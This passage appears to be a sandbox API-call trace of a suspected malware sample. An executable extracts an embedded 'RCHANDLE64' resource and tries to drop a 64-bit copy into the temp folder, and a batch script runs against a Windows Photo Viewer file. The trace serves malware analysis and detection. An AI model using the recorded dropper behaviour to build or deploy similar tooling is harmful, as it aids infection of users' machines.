\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x95\x6e\xeb\xa0\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0295.568] GetLastError () returned 0x0 [0295.568] SetLastError (dwErrCode=0x0) [0295.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0295.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0295.568] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0295.568] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0295.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x95\x6e\xeb\xa0\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0295.568] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0295.568] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0295.569] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0295.569] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0295.569] GetCurrentProcess () returned 0xffffffff [0295.569] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0295.569] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0295.569] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0295.569] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0295.569] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0295.569] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0295.569] LockResource (hResData=0x43c648) returned 0x43c648 [0295.569] GetCurrentPackageId () returned 0x3d54 [0295.569] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0295.570] GetLastError () returned 0x20 [0295.570] GetLastError () returned 0x20 [0295.570] SetLastError (dwErrCode=0x20) [0295.570] GetLastError () returned 0x20 [0295.570] SetLastError (dwErrCode=0x20) [0295.570] GetLastError () returned 0x20 [0295.570] SetLastError (dwErrCode=0x20) [0295.570] GetLastError () returned 0x20 [0295.570] SetLastError (dwErrCode=0x20) [0295.570] GetLastError () returned 0x20 [0295.570] SetLastError (dwErrCode=0x20) [0295.570] GetLastError () returned 0x20 [0295.570] SetLastError (dwErrCode=0x20) [0295.570] WriteFile (in: hFile=0xc0, lpBuffer=0x19ea00*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e32c, lpOverlapped=0x0 | out: lpBuffer=0x19ea00*, lpNumberOfBytesWritten=0x19e32c*=0x49, lpOverlapped=0x0) returned 1 [0295.571] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0295.571] ExitProcess (uExitCode=0x1) Thread: id = 986 os_tid = 0xc28 Process: id = "137" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x64a51000" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9516 start_va = 0x2f0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 9517 start_va = 0x310000 end_va = 0x311fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 9518 start_va = 0x320000 end_va = 0x333fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 9519 start_va = 0x340000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 9520 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 9521 start_va = 0x480000 end_va = 0x483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 9522 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9523 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 9524 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9525 start_va = 0x7fa40000 end_va = 0x7fa62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa40000" filename = "" Region: id = 9526 start_va = 0x7fa66000 end_va = 0x7fa66fff entry_point = 0x0 region_type = private name = "private_0x000000007fa66000" filename = "" Region: id = 9527 start_va = 0x7fa6c000 end_va = 0x7fa6efff entry_point = 0x0 region_type = private name = "private_0x000000007fa6c000" filename = "" Region: id = 9528 start_va = 0x7fa6f000 end_va = 0x7fa6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fa6f000" filename = "" Region: id = 9529 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9530 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9531 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9532 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9533 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9534 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 9535 start_va = 0x4a0000 end_va = 0x4a1fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 9563 start_va = 0x640000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 9564 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9565 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9566 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9567 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9568 start_va = 0x650000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 9569 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9570 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9571 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 9572 start_va = 0x7f940000 end_va = 0x7fa3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f940000" filename = "" Region: id = 9911 start_va = 0x4b0000 end_va = 0x56dfff entry_point = 0x4b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9912 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9913 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 9914 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 9915 start_va = 0x7b0000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 9916 start_va = 0x8b0000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 9917 start_va = 0x7fa69000 end_va = 0x7fa6bfff entry_point = 0x0 region_type = private name = "private_0x000000007fa69000" filename = "" Region: id = 9918 start_va = 0x300000 end_va = 0x303fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 10016 start_va = 0x310000 end_va = 0x313fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 10197 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 10198 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10199 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10200 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10201 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10202 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10203 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10204 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 10762 start_va = 0x9c0000 end_va = 0xcf6fff entry_point = 0x9c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 978 os_tid = 0x864 [0296.239] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0296.239] __set_app_type (_Type=0x1) [0296.239] __p__fmode () returned 0x77984d6c [0296.239] __p__commode () returned 0x77985b1c [0296.239] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0296.239] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0296.239] GetCurrentThreadId () returned 0x864 [0296.240] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x864) returned 0x84 [0296.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0296.240] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0296.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.260] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0296.260] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x47fc28 | out: phkResult=0x47fc28*=0x0) returned 0x2 [0296.261] VirtualQuery (in: lpAddress=0x47fc2f, lpBuffer=0x47fbe0, dwLength=0x1c | out: lpBuffer=0x47fbe0*(BaseAddress=0x47f000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.261] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x47fbe0, dwLength=0x1c | out: lpBuffer=0x47fbe0*(BaseAddress=0x380000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0296.261] VirtualQuery (in: lpAddress=0x381000, lpBuffer=0x47fbe0, dwLength=0x1c | out: lpBuffer=0x47fbe0*(BaseAddress=0x381000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0296.261] VirtualQuery (in: lpAddress=0x383000, lpBuffer=0x47fbe0, dwLength=0x1c | out: lpBuffer=0x47fbe0*(BaseAddress=0x383000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.261] VirtualQuery (in: lpAddress=0x480000, lpBuffer=0x47fbe0, dwLength=0x1c | out: lpBuffer=0x47fbe0*(BaseAddress=0x480000, AllocationBase=0x480000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0296.261] GetConsoleOutputCP () returned 0x1b5 [0296.284] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.284] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0296.284] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.285] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0296.288] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.288] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.294] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.294] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0296.297] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.297] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.300] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.300] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0296.303] GetEnvironmentStringsW () returned 0x7b7ed0* [0296.303] FreeEnvironmentStringsA (penv="A") returned 1 [0296.303] GetEnvironmentStringsW () returned 0x7b7ed0* [0296.303] FreeEnvironmentStringsA (penv="A") returned 1 [0296.303] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x47eb8c | out: phkResult=0x47eb8c*=0x94) returned 0x0 [0296.304] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", 